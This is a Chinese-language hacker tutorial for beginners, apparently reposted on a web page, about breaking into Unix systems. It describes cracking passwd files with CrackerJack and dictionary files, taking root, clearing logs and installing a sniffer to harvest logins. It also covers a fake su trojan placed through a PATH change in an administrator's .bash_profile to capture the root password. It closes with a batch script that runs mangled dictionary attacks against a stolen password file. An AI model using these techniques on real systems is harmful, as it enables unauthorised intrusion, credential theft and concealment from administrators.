主题:
破解(cracking)passwrd 文档
与新手交谈
困难的方法
利用mount命令获取访问权限
有很多方法可以获得一个起始帐号.我将深入每个方面帮助你开始.你所需的只是一个好的帐号,用来获得数百个帐号.想一想这:你进入一个很好的可以利用的系统(大多是linux机器;),夺取root权限并装上一个sniffer(嗅探器);这个tcp sniffer 将监测到网络上任何login(登陆)过程并记录下所有telnet,ftp或拨号进出的login 名和口令;这样即使是一个小以太网你也可获得大约100个口令,如果是一个更大的网络供应商你就会得到全世界的数百个帐号!这一切,你只要有某个可利用系统的一个好帐号和口令就可做到!如果你看起来无法利用某系统的root权限,那就拿它来破解口令,用来和那些但没有shell帐号或磁盘空间的其他hacker及irc使用者交换.决不要把一个你有root权限的系统的口令给出去!你自己留着它!
ok,让我们开始深入获取你的第一个帐号的方法.go!
--------------------------------------------------------------------------------
破解passwd 文档
如果你是按照心中正确的框架去hacking的话,一般都是先运行破解程序直到得到一个可以进入此系统的好帐号.然后login上去看看能否夺取系统的root权限.如果可以,拿了root,移取用得着的文档到你的子目录里,抹去你的在场痕迹,清除所有日志.这样就准备好可以安装sniffer了.
为何要去破解那些只用24小时就可破解出大部分口令的系统?我们的目的不仅仅是正在hack的机器,还有那些与之相连的机器.如果某系统没有利用价值,不要在它上面浪费时间,去寻找下一个目标.后注:如果你仅仅是为了得到上面所说的交换帐号的口令那又另当别论.
得到一个管理员的帐号后,你可能会想读一读他的历史文档,看看他是否曾用过su命令成为root.如果有,你就可以用su特洛伊木马帮你夺取root口令.它如此工作:你更改他(管理员)的shell脚本使得一隐藏目录(.term)被很好安置在搜寻路径里所有目录之前.把伪su程序放在该.term(或其他)目录里.他键下su,对他来说一切都如常,在提示下他键入root口令,然后口令就悄悄地被拷贝到/tmp/.elm69的log文档里,同时删除伪su文件,并返回一个摽诹畲頂的信息让他再试一次.管理员一定认为是他输入错了,便再次运行su,但这回是真的su了.
在后面的uuencode过的附录里,你可找到假su程序.
这是doc文档:
fake su by nfin8 - i-e
irc: /msg i-e
easy as 1,2,3 ...
1.更改路径到你已有访问权限的用户帐号上,此前你应已从历史文档中看到他曾用过su命令;先建立放su特洛伊程序的目录.最好是.term或.elm.
2.确定已编辑过su.c的头部指向你所用路径,使得su特洛伊可自我删除并在第二次尝试让真su程序运行.
3.把所有文件放进目标目录,并编译su.c.
gcc su.c -o su
然后删除su以外的所有文件.一切搞定!
.bash_profile 结构如下:
# .bash_profile
# get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
# user specific environment and startup programs
path=$path:$home/bin
env=$home/.bashrc
username=""
export username env path
把第一行改为:path=$home/.term:$path:$home/bin
当系统管理员运行su时,就会先运行在.term里的su特洛伊然后报告口令出错.su特洛伊程序会在/tmp目录创建包含键入的root口令(或帐户口令)的隐藏文件.如果是非root帐户,它还记录帐户名.然后su特洛伊自我删除使得下次尝试将运行真正的su程序.
你可在/etc目录下的passwd文档前部找到管理员的用户名.只需打:more passwd
你可确信passwd文档的头一二个帐户就是管理员的,虽然有时你也能找到其他人的目录如/staff/username.
历史文档在每个用户目录里.通过阅读它们,你可看到该用户最近使用过的命令,有时能看到最近的100多个命令.寻找.bash_history或history文件,你可用more命令读它们:more .bash_history,也可:more .b*或more .b(然后按键盘上的tab键).
ok,现在你需要一个好的password破解程序.下一章你可看到在没有帐号时如何从系统夺取password文档.但是it is catch 22(我不懂了?:译者),你还是要用到password破解程序.
你需要下列三样东东:
1. password破解程序
2. 好的字典档
3. password 文档
初学者最好的password破解程序当数crackerjack,搜寻web页可以很容易找到它.down下来准备开始.如果你已有所入门,可down一个unix版本的cjack并在shell环境下运行它.但如你是初学,down一个dos/os/2版本好了.
此外还要找一些好字典档.最好的字典档就是名字(names)了.你会在网络上发现最不可靠的口令如男孩的女友名,女孩的男友名啦:)象如'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'’ hackersdict’这样为名的字典档是最好的.
装载crackerjack如:[d:\jack]jack
cracker jack version 1.4 for os/2 and dos (386)
copyright (c) 1993, the jackal, denmark
pwfile(s) : domain.com.passwd
wordfile : domain.com.passwd
上面把password文档作为字典档.这会让你先找出那些用登陆名(login name)作口令的用户,如果用真名(real name )或公司名之类的信息的话,也能马上猜中.这样你就不用苦苦等候程序搜索整个字典档了.
如果想hash(我译做:扩充)字典档以得到更多的词量,可参读crackerjack的doc文档.
所谓hashing(扩充)就是你可告诉crackerjack更改字典档中的词例如在单词的前后加一些数字或字母,就象sandy1或1sandy.你会发现很多用户这样做并以为这更可靠.
下面就是为口令文档和字典档写的hashing文件.通过观察它们,你就会明白你如何修改它们或创建新的hashing文件以满足自己的需要.
------------ start of dicthash.bat
@echo off
cls
echo - this file for dos machines
echo ----------------------------------------------------------------------
echo - to work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your dict and
echo - password file. then use this batch file using the following format:
echo -
echo - dicthash.bat dictfilename.ext passwordfilename.ext
echo -
echo - make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - dicthash will first load jack running the dict file against your
echo - password file in both cases, then it will add numbers 0-9 both to
echo - the begining and end of every dict word. this will take a while,
echo - so go out for that week vacation!
echo -
echo - if you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - mail me some of your hits, let me know how this works for you ;)
jpp -lower %1 | jack -stdin %2
jpp %1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
如对本文有疑问,
点击进行留言回复!!
我要评论
网友评论